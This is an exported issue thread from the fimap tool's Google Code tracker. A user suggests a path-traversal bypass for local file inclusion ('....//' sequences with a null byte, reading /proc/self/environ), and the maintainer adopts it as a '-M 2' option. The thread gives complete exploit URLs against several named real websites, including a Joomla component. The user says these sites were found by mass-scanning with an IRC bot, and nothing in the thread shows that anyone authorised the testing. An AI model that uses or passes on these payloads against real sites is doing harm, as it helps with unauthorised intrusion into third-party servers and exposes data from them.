just suggestion

[GoogleCodeExporter]

i have try LFI method i forgot where i read it :D, and i try it on joomla 
component and it works, may be in the future you can add this kind of exploit 
in fimap modul :D... 
http://www.centroorientamentodonbosco.it/index.php?option=com_agora&task=....//.
...//....//....//....//....//....//....//proc/self/environ%0000

Original issue reported on code.google.com by wishnusa...@gmail.com on 4 Jul 2010 at 5:26

[GoogleCodeExporter]

Hi wishnusakti,

Cool stuff :)
I will try it out tonight and if it's actually decent I am going to implement 
it :)

Thanks man for this idea!
-imax.

Original comment by fimap....@gmail.com on 4 Jul 2010 at 6:25

• Added labels: ****
• Removed labels: ****

[GoogleCodeExporter]

It doesn't work for me somehow. I tried it out on different servers :(
If you have some more servers where it actually work please let me know :)

-imax.

Original comment by fimap....@gmail.com on 15 Sep 2010 at 6:56

• Changed state: Done
• Added labels: ****
• Removed labels: ****

[GoogleCodeExporter]

yes i have another server to test, maybe with dork index.php?view=info_terms... 
later i will send the example :D.....

Original comment by wishnusa...@gmail.com on 16 Sep 2010 at 3:56

• Added labels: ****
• Removed labels: ****

[GoogleCodeExporter]

http://14kmedia.com//?view=....//....//....//....//....//....//....//....//..../
/....//....//proc/self/environ%0000

Original comment by wishnusa...@gmail.com on 16 Sep 2010 at 6:00

• Added labels: ****
• Removed labels: ****

[GoogleCodeExporter]

http://girlsfightboys.com//?view=....//....//....//....//....//....//....//..../
/....//....//....//proc/self/environ%0000, these are the servers i already 
tested... i scan these using bot scanner which run on mirc bro.. i hope this 
can be useful...

wishnusakti

Original comment by wishnusa...@gmail.com on 16 Sep 2010 at 6:21

• Added labels: ****
• Removed labels: ****

[GoogleCodeExporter]

Hey man!

This is actually useful!
Going to implement it for sure since it actually works.
Currently I have some exams. But after them this method will be included.

Thank you very much dude!
-imax.

Original comment by fimap....@gmail.com on 17 Sep 2010 at 7:53

• Changed state: Accepted
• Added labels: ****
• Removed labels: ****

[GoogleCodeExporter]

you're welcome bro... i was edit my friend bot scanner and inspired by fimap 
broo... hehehe... and the com_agora bug i found it while using fimap... ur 
tools really great broo... 

wishnusakti

Original comment by wishnusa...@gmail.com on 17 Sep 2010 at 11:55

• Added labels: ****
• Removed labels: ****

[GoogleCodeExporter]

Hey wishnusakti,

I have implemented this in my current GIT version.
I will push this into SVN once I have tested it enought.

Thank you for suggesting it. Its really good :)
BTW it can be enabled with -M 2 (where 2 is the multiplier of terminal symbols 
like '.' or '/')

-imax.

Original comment by fimap....@gmail.com on 26 Sep 2010 at 5:20

• Changed state: Fixed
• Added labels: ****
• Removed labels: ****